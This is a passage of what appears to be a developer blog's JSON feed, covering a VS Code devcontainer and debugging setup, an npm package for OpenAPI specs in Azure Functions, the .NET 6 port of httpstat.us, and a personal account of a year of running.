a few seconds, just to make sure the emulator has started, download the local certificate and install it to the certificate store.\nLastly, it’s time to create the connection information, so we’ll resolve the IP of the emulator container using ping and some shell parsing, then we’ll use cURL to get the page with the connection string on it and some horrible grep regex to find the right field in the HTML and extract the value.\nI’ll freely admit that this is pretty ugly and hacky in parsing the connection string out, but it’s the best I could find that didn’t require hard coded values.\nWith our IP and account key, we can create the JSON file for the API, with a bit of echo and string interpolation.\nThen within the devcontainers.json file we can add "postCreateCommand": "sh ./.devcontainer/startup.sh" to have our script run.\nUsing the self-signed certificate Something I made a comment of in the previous post was that Node doesn’t make it easy to use self-signed certificates and this caused some challenges when it came to using the CosmosDB emulator (you’d need to set an environment value that would result in a warning on all network calls).\nAfter some digging around, it turns out that there is a way to solve this, using the --use-openssl-ca flag to the Node.js binary, which tells it to use the local certificate store as well. That’s all well and good when you can control the launching of a Node.js binary, but what if it’s not under your control (it’s launched by a third party)? We can use the NODE_OPTIONS environment variable to apply a CLI flag to ever time Node is launched, and that can be controlled with the remoteEnv section of devcontainers.json:\n1 2 3 4 "remoteEnv": { "LOCAL_WORKSPACE_FOLDER": "${localWorkspaceFolder}", "NODE_OPTIONS": "--use-openssl-ca" }, Awesome, now any Node process we run can talk to the CosmosDB emulator via HTTPS using the provided certificate.\nExtensions VS Code has lots of extensions, and everyone has their favourite. But extensions can be used for more than adding colours to indents or additional language support, they can be used to enforce standards within a repository.\nJavaScript projects will often use formatters and linters to do this, with prettier and eslint being two of the most popular.\nWith VS Code we can define an extensions.json file within the .vscode folder that contains a list of extensions that VS Code will offer to install for the user when they open a folder. Here’s a base set that I use for this kind of a project:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 { "recommendations": [ "ms-azuretools.vscode-docker", "ms-azuretools.vscode-azurefunctions", "ms-azuretools.vscode-azurestaticwebapps", "ms-azuretools.vscode-cosmosdb", "ms-vsliveshare.vsliveshare-pack", "github.vscode-pull-request-github", "GitHub.copilot", "editorconfig.editorconfig", "dbaeumer.vscode-eslint", "esbenp.prettier-vscode" ] } Because we’re within a Docker container, we may as well install the Docker extension, it’ll give us some syntax highlighting and ability to inspect the container if required.\nAs we’re talking about Static Web Apps and CosmosDB, having those extensions (including Azure Functions, which backs the API side of SWA) installed is a good idea. You can even connect the CosmosDB emulator to VS Code!\nFor collaboration, I include VS Code Live Share. This will just make it easier for everyone to work together on the project and do as much collaboration from within VS Code itself, without context switching.\nSince I’m using GitHub, I’ve added the GitHub extension and GitHub Copilot, because it’s awesome.\nFinally, we’ll include extensions for EditorConfig, eslint and prettier, which helps setup up a consistent environment and ensures that we’re all doing linting and formatting without having to think about it.\nSince we’re using a devcontainer, you can also add these to the devcontainer.json list of extensions, so that VS Code automatically installs them when you create a devcontainer, meaning the environment is fully configured and ready to run when opened.\nDebugging With our environment setup, and able to be repeatably setup, now it’s time to do some actual work; and that means we’re likely to do some debugging.\nServer-side debugging Whether we’re building an app that runs a Node.js server like Express or using a serverless backed like Azure Functions (which SWA does), we’re going to want some way to debug the server-side code.\nVS Code has done some major improvements to the JavaScript debugger to make this simpler. Now, any time you run Node from a terminal VS Code will automatically attach the debugger, meaning all you need to do is pop the terminal (CTRL + `) and run npm start to have the debugger setup. You can learn more about the new debugger on VS Codes docs.\nClient-side debugging Whether you’re using a framework like React, or doing something with gasp vanilla JS, you’ll likely have to debug the client-side JavaScript at some point, which will see you opening the browser developer tools and setting breakpoints.\nWhile this is 1000 times better than when I first started doing web development (shout out to all those who did alert-based debugging!), it still results in a disconnect between the place we build our app and the place we debug it.\nWell, another new feature of the VS Code JavaScript debugger is browser debugging!\nTo use this, open a link from a terminal that has the JavaScript debugger attached or using the Debug: Open Link command from the command palette (CTRL + SHIFT + P), and now VS Code will connect to Edge or Chrome (depending on which is your default browser, sorry no Firefox at the moment) and forward all client-side JavaScript debugging to VS Code, allowing you to put a breakpoint on the exact file you wrote and debug it.\nThis also means that if you’re debugging an end-to-end process, like a button click through fetch request to the server, you have a single tool in which you are doing debugging, no switching between the browser and editor for different points in the debug pipeline.\nAside - this doesn’t work reliably from within a devcontainer, especially if you’re using them on Windows with WSL2. This is because you’re trying to hop across a lot of network and OS boundaries to connect the various tools together… but then again, debugging the client-side JavaScript in a browser running on Windows while the server is running on a Linux container via WSL2, back to a UI tool running on Windows… I’m not surprised it can be a bit unreliable!\nLaunch it all 🚀 While yes, we can pop open a bunch of terminals in VS Code and run npm start in the right folder, we can make it even simpler than that to get our app running and debugging, and that’s using launch.json to start the right debugger.\nHere’s one that will 1) start the front-end app, 2) start Azure Functions and 3) run the SWA CLI to use as our entry point:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "version": "0.2.0", "configurations": [ { "command": "swa start http://localhost:3000 --api http://localhost:7071", "name": "Run emulator", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run frontend", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run backend", "request": "launch", "type": "node-terminal", "cwd": "${workspaceFolder}/api" } ] } This would still require us to run three separate commands to start each debugger, but thankfully VS Code has an answer for that, using compound launch configurations. This is where we provide an array of launch commands and VS Code will run all of them for us:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 { "version": "0.2.0", "configurations": [ { "command": "swa start http://localhost:3000 --api http://localhost:7071", "name": "Run emulator", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run frontend", "request": "launch", "type": "node-terminal" }, { "command": "npm start", "name": "Run backend", "request": "launch", "type": "node-terminal", "cwd": "${workspaceFolder}/api" } ], "compounds": [ { "name": "Launch it all 🚀", "configurations": ["Run emulator", "Run frontend", "Run backend"] } ] } Admittedly, this will cause the SWA CLI to run before the other components are also running, so it does sometimes timeout and need to be restarted (especially if you’re using TypeScript to do a compilation step before launching the Functions), but I find that to be a minor issue in the scheme of things - just find the right debugger on the toolbar and restart it.\nDebugger Extensions Did you know that there are extensions to make the VS Code JavaScript debugger even more powerful than it already is? These are two that I like to add to my extensions.json and decontainer.json to ensure that they are always available.\nPerformance Insights Microsoft released a companion extension to the VS Code debugger, vscode-js-profile-flame which will give you real-time performance (CPU and memory) of the JavaScript app that you’re debugging.\nWhat’s even cooler is that if your debugging a client-side app, you’ll also get metrics for things like the DOM, restyle and re-layout events, important diagnostic information when you’re performance turning a web app!\nDebugging Styles There’s one more part of a web application we may need to debug, and that’s the CSS (yes, I’m calling it debugging, don’t @ me 😝).\nYou might think that this is something that you’ll still be context switching to the browser for but nope! The Microsoft Edge team has an extension that brings the element inspector and network panel into VS Code.\nNow, if you use the inspector to find an element in the DOM, you’ll find the CSS that is applied with the file link taking you to the file in VS Code, even if you’re using a source map! This means that you don’t have to jump between the browser to inspect the elements and the editor to persist updated, you’re also right in the editor with the originally authored file, reducing context switching.\nTo use this, we can use the Edge extension from the sidebar to launch a new instance of Edge with VS Code attached but be aware that going this route will not connect the JavaScript debugger to that version of Edge. If you have the JavaScript debugger attached and the DOM/network inspector, there’s a new icon on the debugger toolbar (next to the drop down list to change the debugger you’re attached to) that, when clicked, will connect the Edge debugger extension to a running version of Edge!\nSo, with this we can debug the server code, the client code, inspect performance metrics, inspect the DOM, edit styles and view the network requests, all without leaving VS Code.\nPretty slick if you ask me.\nAgain, this can be hit and miss when running in a devcontainer for obvious reasons.\nConclusion This is, admittedly, quite a long post, but that’s because there really is a lot of stuff to cover here.\nFirst, we looked at how to make a completely local, repeatable dev environment using the Linux emulator for CosmosDB and combine that with another Docker container that we can build a web app within.\nNext, we setup a consistent web dev environment by pre-installing VS Code extensions into it that will make it easier to enforce style and linting rules for a project, reducing the onboarding curve for someone into a project.\nFinally, we looked at debugging, and how VS Code can debug both the server and client JavaScript, that we can use compound launch tasks to start all the servers we need (and even the SWA CLI), before learning about two more extensions that can level up the debugging experience by introducing performance metrics and bringing more of the browser dev tools into VS Code itself.\nIf you want to see how this can be applied to a repo, I’ve forked the Startup Adventurer SWA project and added everything to it.\nAlso, since this is a long post, I’ve recorded a video where I’ve walked through everything, for those who are more visual learners.\n", "id": "2022-03-04-the-ultimate-web-dev-environment" }, { "title": "OpenAPI for JavaScript Azure Functions", "url": "https://www.aaron-powell.com/posts/2022-02-08-openapi-for-javascript-azure-functions/", "date": "Tue, 08 Feb 2022 22:38:39 +0000", "tags": [ "azure", "serverless", "javascript", "azure-functions" ], "description": "A new tool for generating OpenAPI specs from JavaScript and TypeScript Azure Functions", "content": "OpenAPI, formerly known as Swagger (or still known, depending who you ask!), is used to describe a REST API’s\nLast year my colleague Justin Yoo released an extension for .NET Azure Functions to generate OpenAPI definitions and not long afterwards he reached out to me on whether it’d be possible to do something similar for JavaScript/TypeScript Functions.\nWell, good news, I’ve created a npm package to do that, which you can find on GitHub and in this post we’ll take a look at how to use it.\nHow it works This npm package works conceptually similar to the .NET one in that you annotate the Function handler to provide OpenAPI schema information. This is done using a wrapper, or higher order, function, which takes a JavaScript object in that represents the schema for OpenAPI.\nThe second part of the plugin is used to create an endpoint which the OpenAPI spec file will be exposed via.\nAlso, the package will give you the option to use each of the different spec version, v2, v3 and v3.1, so you can describe the API in the way that’s right for consumers.\nAnnotating a Function Let’s look at how we can annotate a Function to expose an OpenAPI spec, and we’ll look at the Trivia Game example, specifically the game-get API.\nNote: The Function handler doesn’t really matter as there’s (at least currently) no inspection of it being undertaken, JavaScript doesn’t have enough of a type system to do runtime reflection and figure that stuff out on the fly, so I’ll keep that abbreviated for the sample.\nWe’ll use the OpenAPI 3.1 spec, which is the latest at time of authoring, as the schema, so the first thing is to import the mapping function:\n1 2 3 4 5 6 7 8 9 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; export default async function( context: Context, req: HttpRequest ): Promise<void> { // snip } Next, we’ll change the export default to be a call to the mapping function, rather than the Function handler itself:\n1 2 3 4 5 6 7 8 9 10 11 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", {}); The mapOpenApi3_1 (aliased as openApi in my sample) takes three arguments:\nThe Function handler that the trigger invokes The path for the API The OpenAPI spec definition for this path Note: If you’re using TypeScript, you’ll get type help as you build out your schema, thanks to the openapi-types npm package.\nThis Function will respond on a GET request, expect the gameId to be a URL parameter and return a 200 when the game is found or a 404 if it is not, so we can describe that in our object. Let’s start with the parameter:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", { get: { parameters: [ { name: "gameId", in: "path", required: true, description: "Gets a game that's being played", schema: { type: "string" } } ] } }); The top level of the object is the verb that we’re going to be working with (you can define multiple verbs for each Function) and then we use the parameters array to describe the parameter. The gameId is being describe as required and that it’s a string, plus we can attach some metadata to it if we desire, I’m giving it a description for example.\nNow we can define some responses. Let’s start simple with the 404:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", { get: { parameters: [ { name: "gameId", in: "path", required: true, description: "Gets a game that's being played", schema: { type: "string" } } ], responses: { "404": { description: "Unable to find a game with that id" } } } }); Here we’ve added a new responses property and we can define any status code we want as the response code and attach info to it. Since this was a 404, all I’ve done is defined the description as it won’t return a body. For a more complex one, let’s put in the 200:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { mapOpenApi3_1 as openApi } from "@aaronpowell/azure-functions-nodejs-openapi"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { // snip }; export default openApi(httpTrigger, "/game/{gameId}", { get: { parameters: [ { name: "gameId", in: "path", required: true, description: "Gets a game that's being played", schema: { type: "string" } } ] }, responses: { "200": { description: "Successful operation", content: { "application/json": { schema: { type: "object", allOf: [ { $ref: "#/components/schemas/Game" } ] } } } }, "404": { description: "Unable to find a game with that id" } } }); The 200 response will have a body and that is defined in the content property, in which you can set the content for the different possible mime types. I’m only supporting a mime type of application/json, so that’s all that’s defined and for the content it returns we’re using a schema reference to a component defined elsewhere in our spec. This is useful if you’ve got objects that can be used in multiple places, which the Game time would likely be (it’s shared between GET and POST in the sample).\nBut that’s the first part completed, we’ve defined the spec information for our game-get API, on to creating the endpoint that will make it available to us.\nDefining the swagger.json endpoint We’ve got to the effort of annotating our Function but there needs to be some way in which consumers and get that, and to do that, we need to create a Function for them to access it. Start by creating a new HTTP Trigger Function, delete it’s contents and then we can use another helper function from the npm package:\n1 2 3 import { generateOpenApi3_1Spec } from "@aaronpowell/azure-functions-nodejs-openapi"; export default generateOpenApi3_1Spec({}); With this Function we’re going define the shared metadata and components that our OpenAPI spec requires, as it’ll be merged with the annotated Functions at runtime. Start by telling consumers about the API:\n1 2 3 4 5 6 7 8 import { generateOpenApi3_1Spec } from "@aaronpowell/azure-functions-nodejs-openapi"; export default generateOpenApi3_1Spec({ info: { title: "Awesome trivia game API", version: "1.0.0" } }); This is really the minimum you need to do, but since we used $ref to reference a shared component schema, we should define that as well. I’ll only show one of the shared components, as this object model has components that reference other components, but you should get the idea:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 import { generateOpenApi3_1Spec } from "@aaronpowell/azure-functions-nodejs-openapi"; export default generateOpenApi3_1Spec({ info: { title: "Awesome trivia game API", version: "1.0.0" }, components: { schemas: { Game: { type: "object", properties: { id: { type: "string", description: "Unique identifier for the game" }, state: { type: "string", description: "The status of the game", enum: ["WaitingForPlayers", "Started", "Complete"] }, questions: { type: "array", items: { $ref: "#/components/schemas/Question" } }, players: { type: "array", items: { $ref: "#/components/schemas/Player" } }, answers: { type: "array", items: { $ref: "#/components/schemas/PlayerAnswer" } } } } } } }); And there you have it, Game is now defined and can be used as a reference elsewhere within our spec. You can find the full implementation with all other schema objects in the GitHub source.\nStart up your Azure Functions (with CORS enabled) and pop the spec endpoint into Swagger UI and you’ll see your docs generated!\nConclusion There we have it, a working app in Azure Functions which provides OpenAPI docs for anyone who wants to consume them.\nRight now this is a proof-of-concept project more than anything, and we’re looking for feedback on whether this is a useful tool to have for people creating Azure Functions in JavaScript/TypeScript or whether there’d be a better solution, so if you want to give it a try take the npm package for a spin and get in touch.\nI have ideas of things to do next, but I’m more keen to solve the problems that you’d experience with it first.\n", "id": "2022-02-08-openapi-for-javascript-azure-functions" }, { "title": "httpstat.us - Now With .NET 6", "url": "https://www.aaron-powell.com/posts/2022-01-17-httpstatus-now-with-net-6/", "date": "Mon, 17 Jan 2022 04:33:38 +0000", "tags": [ "web", "dotnet" ], "description": "Bringing this little service to the modern age", "content": "Over a decade ago, Tatham Oddie pushed the first commit, followed closely by my commit of the starting code, to what would become httpstat.us. Fun fact - this was originally a Ruby app with a database, but it was rewritten the following month in C# on ASP.NET MVC3.\nYears went by, I kept renewing the domain and the Azure resourced paid, the codebase was upgraded to the latest .NET Framework runtimes, but it kind of just… existed.\nEventually Mickaël Derriey ported it to .NET Core but because of reasons, this never got deployed, and it just kind of sat there.\nWell, at the end of 2021 I had some time on my hands, so I decided it was time to finish what’d been started, port to .NET 6 and run it as a containerised app.\nPorting to .NET 6 was really straight forward a process, just change the Target Framework Moniker to net6.0 and update the GitHub Actions, and we were done. The real fun can to deploying it to Azure as a container.\nMy goal was to deploy it as a custom App Service container and then make that container available for anyone who wants to self-host the site.\nSite goes boom With the Dockerfile created, a new GitHub Actions pipeline to build and publish container images, and a step to update the App Service to use them, I assumed everything would be all good. After all, I was running it locally in Docker, so it should work in production using Docker right?\nNo, that’s not what happened, the App Service would time out on start up. After countless deployments, pulling the image locally to test it (it worked locally) and increasingly deep dives into the App Service logging components I was out of ideas as to why it wouldn’t start… Until I got a breakthrough.\nHow App Service validates container startup I decided to sandbox the problem in a brand new .NET 6 app, and add in the code for httpstat.us piece by piece to find the offending line of code. I got to the point where I would add the logic for handling status codes, but as soon as it was added I’d get the following logs (this is from the sample I was rebuilding):\n2021-12-15T23:39:06.601Z INFO - Starting container for site 2021-12-15T23:39:06.606Z INFO - docker run -d -p 80:80 --name aapowell-dotnet6-mvc_0_5778b9ac -e WEBSITES_ENABLE_APP_SERVICE_STORAGE=false -e DOCKER_CUSTOM_IMAGE_NAME=registry20211215115650.azurecr.io/webapplication1:20211215231822 -e WEBSITE_SITE_NAME=aapowell-dotnet6-mvc -e WEBSITE_AUTH_ENABLED=False -e PORT=80 -e WEBSITE_ROLE_INSTANCE_ID=0 -e WEBSITE_HOSTNAME=aapowell-dotnet6-mvc.azurewebsites.net -e WEBSITE_INSTANCE_ID=80fa370e688dca2b88312acd83eb0059bdb22388056f36ce8b5a46f963d6eec6 registry20211215115650.azurecr.io/webapplication1:20211215231822 2021-12-15T23:39:06.609Z INFO - Logging is not enabled for this container. Please use https://aka.ms/linux-diagnostics to enable logging to see container logs here. 2021-12-15T23:39:12.965Z INFO - Initiating warmup request to container aapowell-dotnet6-mvc_0_5778b9ac for site aapowell-dotnet6-mvc 2021-12-15T23:39:46.036Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 33.0710629 sec 2021-12-15T23:40:01.435Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 48.4703022 sec 2021-12-15T23:40:16.762Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 63.7977782 sec 2021-12-15T23:40:33.149Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 80.1846337 sec 2021-12-15T23:40:48.385Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 95.4199035 sec 2021-12-15T23:41:09.251Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 116.2859279 sec 2021-12-15T23:41:24.489Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 131.5245851 sec 2021-12-15T23:41:48.387Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 155.4220304 sec 2021-12-15T23:42:03.615Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 170.6498268 sec 2021-12-15T23:42:18.827Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 185.8618694 sec 2021-12-15T23:42:34.047Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 201.0824415 sec 2021-12-15T23:42:49.304Z INFO - Waiting for response to warmup request for container aapowell-dotnet6-mvc_0_5778b9ac. Elapsed time = 216.338939 sec 2021-12-15T23:43:03.556Z ERROR - Container aapowell-dotnet6-mvc_0_5778b9ac for site aapowell-dotnet6-mvc did not start within expected time limit. Elapsed time = 230.5910478 sec 2021-12-15T23:43:03.558Z ERROR - Container aapowell-dotnet6-mvc_0_5778b9ac didn't respond to HTTP pings on port: 80, failing site start. See container logs for debugging. 2021-12-15T23:43:03.566Z INFO - Stopping site aapowell-dotnet6-mvc because it failed during startup. The container starts, but then it times out during the warmup request as that never responds, thus the container is killed after 230 seconds, which is the default (yes, I tried increasing the startup timeout, all that did was make it take longer before I knew it failed).\nWith the help of a bunch of Console.WriteLine statements, I was able to watch the startup process of the App Service, and I noticed a request coming to something I didn’t recognise, something like /robots933456.txt, which doesn’t exist in the container. Weird, nothing I’m doing makes that request, so what is it.\nSome web searching later and I landed here which is the App Service docs explaining that file. It turns out that when App Service starts the container, it probes for this file and waits for a 404 response. So, why did it break for me?\nWell, because there’s a bug in httpstat.us’s route handling. First, some background to the way the site works. Any request that comes in that could be a status code is either matched to known ones, or parsed as an unknown and returned. This means that you could request a status code of 999 if you wanted, and we’ll send you back that as a status code. This is really just to help people who are using non-standard web server configurations, rather than just being strictly standards compliant.\nBut as I said, there was a bug. The routing was looking for anything that comes in after the / that we didn’t have a predefined route for (of which we don’t really have many), not just things that are numerical, so the request for /robots933456.txt was being treated as a status code and returned, but since it’s not a valid number, the status code was 0, so App Service was receiving 0 as the status code response rather than the 404 it was expecting, so it’d keep waiting until eventually it timed out.\nI added in an int route constraint, deployed and we were finally working again! 🎉\nOther changes For a little over a month now the site has been running .NET 6 in a container and it seems to be going just fine. I need to learn how to use App Insights properly to understand the performance metrics, but in the last hour (as of time of writing) almost 400k requests were served, which seems pretty decent.\nIf you want to self-host it, you can run the same Docker image that is run in production, it’s available via GitHub packages.\nThe other notable changes are:\nResponse Transport-Encoding is chunked, which is the default for Kestrel There’s no more X-Served-By header, that came from IIS and we’re not using that anymore I’d recommend you use the Server header, which is standard It’s HTTPS only, as it should be I haven’t tested CORS, but it should work If it doesn’t open an issue There’s probably other things that have changed, but that’s the stuff that I’m at least aware of.\nNext steps Now that the major rework has been done and the codebase modernised, my next step is to tackle the fair use policy which I’d outlined at the start of 2021.\nI still don’t have a timeline for completing that work, as I need to look at how to best roll it out and not impact current users significantly. In the mean time, chime in on the GitHub issue if you’ve got any questions or feedback on the policy.\n", "id": "2022-01-17-httpstatus-now-with-net-6" }, { "title": "1300km", "url": "https://www.aaron-powell.com/posts/2022-01-12-1300km/", "date": "Wed, 12 Jan 2022 00:17:27 +0000", "tags": [ "running" ], "description": "The story of my running in 2021", "content": "At the start of 2020 I wrote a post called 1000km in which I talked about my running journey throughout 2019 and getting to the goal of 1000km in 12 months.\nTwo years and a global pandemic later, I thought I’d do an update to that post on where I’m at with my running, and what I’ve learnt over the time.\nI won’t go over all the background of “getting into running” in this post, as I covered that last time and I’d encourage you read it to get some more context to what I’ll cover off here.\nThe raw stats According to my Strava profile, in 2021 I ran a total of 1,319km over 103 hours and 51 minutes across 160 separate runs. December was my biggest running month at 170km across (I think) 20 activities (I’m finding Strava frustratingly limiting in the way I was to get insights on my data).\nThis is just shy of 300km more than 2019 but interestingly, in 2019 I did 164 runs, meaning that my average run distance in 2021 was longer (8.2km vs 6.2km). I’d attribute this to the fact that parkrun wasn’t on for a large period of 2021, so I wasn’t restricting myself to 5km runs on Saturdays.\nRunning more seriously As I talked about in the last post, I run for fun and fitness, but it’s not something I’ve been serious about; I’m never going to be an elite athlete or anything.\nThrough 2020 I ran more, mostly out of lockdown boredom, but it was all much of the same, same routes, same times, same, same, same. Towards the end of 2020 I was invited by my running friends to a trial day at a running group they attended, RunLab. This is a coach-led running group at a local park (one that I run around at least once a week anyway!) with a scheduled program. I enjoyed it so ended up signing up and did 3 of the 4 terms in 2021 (I was injured going into a term so sat it out).\nThis was a rather different approach to running for me though. Up until now the closest to having a program was the Wednesday with friends where we rotated through 1km intervals, hills and tempo, but it was the same three formats and the only person pushing you harder was yourself.\nRunLab, while you might loosely categorise in the same three buckets, it was more than that. We’d do speed work, but one week it might be 400m reps and the next it’s fartlek, or we’d do some pacing practice before running hills. We’d also do things like warm up/cool down, which I never do on my own (even before races!).\nAll of this saw me shift a bit in my mentality towards running, it is not just a case of “throw on the shoes and pound the pavement” but looking more at it as a workout.\nThe other thing I noticed about my running is being better in tune with what I’m doing. I don’t think I’m that much faster than where I was previously (in fact, my parkrun times have been slower than my 2019 peak), but I now better understand my pace. When I go for a run, I’m less reliant on my watch to tell me what pace I’m running, instead I just know. For the last few weeks, I’ve been running more frequently, so I wanted to hold a slower pace, around 4:45min/km, and I’m able to do that without constant watch checking. I guess it’s a bit hard to describe, but when running I can fairly accurately guess the pace I’m at, confirm with my watch, and adjust accordingly.\nHaving a better understanding of myself and my pacing makes it easier to plan out what runs I’m going to do and how long I expect them to take (so, whether I’ll need to set an alarm, or I can sleep in 😜).\nIt’s also helping me estimate where I’ll be when races do come back. I’m hoping for some in person races in 2022, I’m wanting to target a 95min half marathon and a sub-60min City2Surf. Both should be achievable based on what I’m finding I can run comfortably in training, but we’ll see what injuries crop up.\nInjuries Speaking of injuries, 2021 was the year for them. I’ve not really had major muscle injuries throughout my life, sure there’s been some minor strains here and there, but the only real notable one was in 2019 where I tore my Achilles before City2Surf.\n2021 changed that, I had two major injuries. First it was my hamstring, then it was my calf, both on the right side.\nOn a wet Wednesday at the end of February, we decided to call off the usual group run, and it was everyone’s call as to whether they slept in or did their own thing. I like running in the rain, so I decided to go out on one of my local routes. Since it was a wet morning (think torrential heavy rain), I figured I’d have a crack at a Strava segment I’ve been wanting to reclaim from our former RunLab coach. It’s a 6km segment, pretty much dead flat, and I’d nabbed it from him, to which he countered a few days later (and took 25s/km average off my pace 😭).\nUp until this point my training was going well, I was feeling strong but I’d still have to push to my threshold to get it, so I did a 1km warm up before putting the foot down. There was no one on the path, the rain was coming down hard and I was splashing through puddles. It felt good for the first ~3km but coming to the end of the 3rd km, I could feel my hamstring stiffening up. That wasn’t good, so I decided to ditch going for the Strava crown and ease it back a bit, as I’m 4km from home now (it’s an out-and-back loop with a 1km warm up/cool down on the 6km segment). Another km down and it’s not loosening up even at a slower pace, so I keep dropping down until… snap, my hamstring goes.\nI’m a little over 3km from home with nothing more than my clothes and watch (I tended not to run with my phone), it’s raining hard and my hamstring has given out on me. I hobbled home, in about the same amount of time it’d taken for me to do the 5.5km and booked into the physio. Thankfully it wasn’t too bad an injury and I was only off running for a few weeks, but it was a setback in keeping on track for my distance goals.\nFast forward to May and it was time for another injury! We were doing 1km intervals at RunLab and I felt my calf get really tight, so I eased back the speed and it felt ok, not perfect, but ok. I thought I might be on the edge of another muscle strain, so I decided to take a week off running, run parkrun the following week but it was still not right. Skipped a long run that week, went out with my Wednesday crew, nope, calf still sore. Another week of rest, went to RunLab and it was clear that things aren’t getting better, so, back to the physio!\nWhat I learnt is that my approach of “oh, might be a strain, let’s do no exercise at all” is a really bad way to tackle recovery. Basically, what was happening was that the muscle was generating scare tissue around the injury site, but since I was doing no exercise (working from home means I wasn’t even getting incidental exercise from walking anywhere) I wasn’t stretching the new tissue out, so as soon as I ran (resulting in a long stride), it would re-tear. Rinse and repeat this for a few weeks and I’d done a huge disservice to my body… and my wallet in getting myself fixed!\nPro tip - unless you actually know what you’re doing, don’t try to self-diagnose and fix a muscle tear!\nReturning from injuries and new goals While I was recovering from the calf tear, I got back into cycling, first on a stationary bike, then out on my road bike. This helped keep a level of fitness and strength up, so when I could run again it would be from an ok base.\nBut my yearly goal of 1300km was looking unlikely, I’m hundreds of km behind where I should be, so I resided to the fact that it wasn’t to be this year and I should just focus on getting fit and strong again.\nThen we went into lockdown for several months in Sydney. I was no longer able to go to the gym and ride the stationary bike, my cycling route was out of bounds due to movement restrictions, but thankfully my calf was on the mend, so I got back into running again. I wasn’t going to be going for any crowns or long distance, but I could still pick it up a bit more.\nBy the time September rolled around I was feeling towards my peak (at least for 2021!), being comfortable with 15km at 4:30 pace and able to run 35km+ per week. I also saw my yearly goal getting closer and closer. Going with my usual plan, I needed to run 26km per week to make 1300km (with 2-week buffer), but I’d already used more than my 2 week buffer but could commit to nearly 10km over, so maybe it would be possible.\nCome the middle of December and I did the maths, I had around 90km left and 15 days to go, so I’d need to average 6km per day to hit it… doable but tough (I’ve never done a streak like that). I did a long run on the 19th and it saw me hit 50km in a week for the first time ever (50.2km to be exact). This meant I’d banked some km and took the 20th and 21st off, then started chipping away again. I ran some overage and by Christmas it was clear that I’d make my distance goal, but I decided to try for something else, 2 weeks of daily running. I hadn’t missed a day since the 22nd of December, so I needed to keep going until the 5th January.\nThe last week of 2021 (and the first two days of 2022) saw me get a new weekly peak of 52.8km, and pushing it through to the 5th January saw me complete my two week challenge in which I ran 115km across 18 activities (I had a few double up days with parkrun 😜), but I did it and my legs earned a few days rest (ok, they really only got one day off).\nTech For years I’ve used a Fitbit as my tracker when running, but after years of frustration with how they end-of-life their top-end devices after a single generation, I went back to Garmin. I got myself a Fenix 6 Pro, migrated my data and haven’t looked back.\nI’ve not really made the most of the device yet, I’m going to do more with the workouts feature in 2022, but it’s a decent device and does the level of tracking that I realistically need.\nThe other thing I got myself was a massage gun for Christmas, a Theragun Prime. My wife gave me a hard time about it, but after a few goes, she’s a convert. While doing my 14-day challenge, I would use it before and after, especially on my calves and ankles, which are where I’m finding most stiffness.\nA bonus of my job is that I’m often watching recordings of meetings, so while sitting and watching, I grab it out and work through whatever is sore at the time!\nStrava is still the main place that I track my data, but while preparing for this post, I’ve come to realise that it’s quite frustrating to get insights into your own data in ways you want. It’s really lacking much in the way of reporting and visualisation. Garmin Connect doesn’t seem to be much better, so I might ponder on how to better produce the insights that I’d like myself.\nConclusion I’ve definitely changed my perspective on running over the past few years, from it being something I do to keep some fitness up, to something I do because I enjoy it and want to get better. I’m by no means an elite runner, nor will I ever be, and while 1300km seems like a lot, it’s all relative (one of the ladies I run with did over 3000km in 2021!). Taking it more seriously has been useful for me to understand my body better with running, learn 